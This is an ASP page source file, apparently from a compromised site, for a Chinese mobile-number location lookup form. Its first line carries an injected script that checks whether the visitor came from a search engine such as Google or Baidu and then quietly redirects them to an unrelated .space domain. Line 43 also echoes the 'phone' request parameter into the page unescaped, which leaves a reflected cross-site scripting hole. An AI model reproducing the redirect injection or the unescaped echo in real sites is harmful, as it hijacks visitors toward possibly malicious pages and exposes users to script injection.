d:\wwwroot\wuchunhua\phone.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
002:
<html>
003:
<head>
004:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
005:
<title>手机号码查询归属地</title>
006:
<script language="javascript">
007:
<!--
008:
function checkMobile(){
009:
var sMobile = document.mobileform.mobile.value
010:
if(!(/^1[3|5][0-9]\d{4,8}$/.test(sMobile))){
011:
alert("不是完整的11位手机号或者正确的手机号前七位");
012:
document.mobileform.mobile.focus();
013:
return false;
014:
}
015:
window.open('', 'mobilewindow', 'height=197,width=350,status=yes,toolbar=no,menubar=no,location=no')
016:
}
017:
//-->
018:
</script>
019:
020:
<style type=text/css>
021:
p,td {font-size:16px}
022:
A:link {COLOR: #1c5f82; TEXT-DECORATION: none}
023:
A:visited {COLOR: #1c5f82; TEXT-DECORATION: none}
024:
A:hover {COLOR: #cc5533; TEXT-DECORATION: underline}
025:
.subt {COLOR: #aa3333; FONT-FAMILY: "宋体"; FONT-SIZE: 9pt}
026:
.tdc {COLOR: #333333; FONT-FAMILY: "宋体"; FONT-SIZE: 9pt}
027:
.tdc1 {COLOR: #ffffff; FONT-FAMILY: "宋体"; FONT-SIZE: 9pt}
028:
.tdc2 {COLOR: #008000; FONT-FAMILY: "宋体"; FONT-SIZE: 9pt}
029:
.bdtj {BACKGROUND: #6699cc; BORDER-BOTTOM: #6699cc 1px solid; BORDER-LEFT: #6699cc 1px solid; BORDER-RIGHT: #6699cc 1px solid; BORDER-TOP: #6699cc 1px solid; COLOR: #ffffff; FONT-SIZE: 9pt; HEIGHT: 18px}
030:
BODY {SCROLLBAR-HIGHLIGHT-COLOR: #f7f7f7; SCROLLBAR-SHADOW-COLOR: #f7f7f7; SCROLLBAR-ARROW-COLOR: #EFF1F3; SCROLLBAR-TRACK-COLOR: #EFF1F3; SCROLLBAR-BASE-COLOR: #f7f7f7; text-align:center}
031:
</style>
032:
</head>
033:
<body>
034:
<div align="center"><center>
035:
</center></div>
036:
<div align="center"></div>
037:
<div align="center"><center>
038:
<table border="1" borderColor="#6699CC" cellSpacing="0" height="1" width="61%" align="center" cellpadding="0">
039:
<tr><td class="p2" height="-2" vAlign="top" width="99%" bgcolor="#6699CC"><p align="center"><font color="#FFFFFF"><strong>手机号码所在地区强力查询</strong></font></td></tr>
040:
<tr><td class="p2" height="12" vAlign="top" width="99%"><p align="center">输入手机号即可知道用户所在的地区</td></tr>
041:
<tr>
042:
<td class="p2" height="15" vAlign="top" width="99%"><form action="http://www.ip138.com:8080/search.asp" method="post" onsubmit="return checkMobile();" target="mobilewindow" name="mobileform">
043:
<input type="hidden" name="action" value="mobile"><div align="center"><center><p> 手机号码(段)<input name="mobile" class="TextBoxStyle" value="
<%
=request("phone")
%
>" size="15" maxLength="11">
044:
<input class="ButtonStyle" type="submit" value="查询"></p>
045:
</center></div>
046:
</form>
047:
</td>
048:
</tr>
049:
</table>
050:
</center></div>
051:
</body>
052:
</html>
053:
054: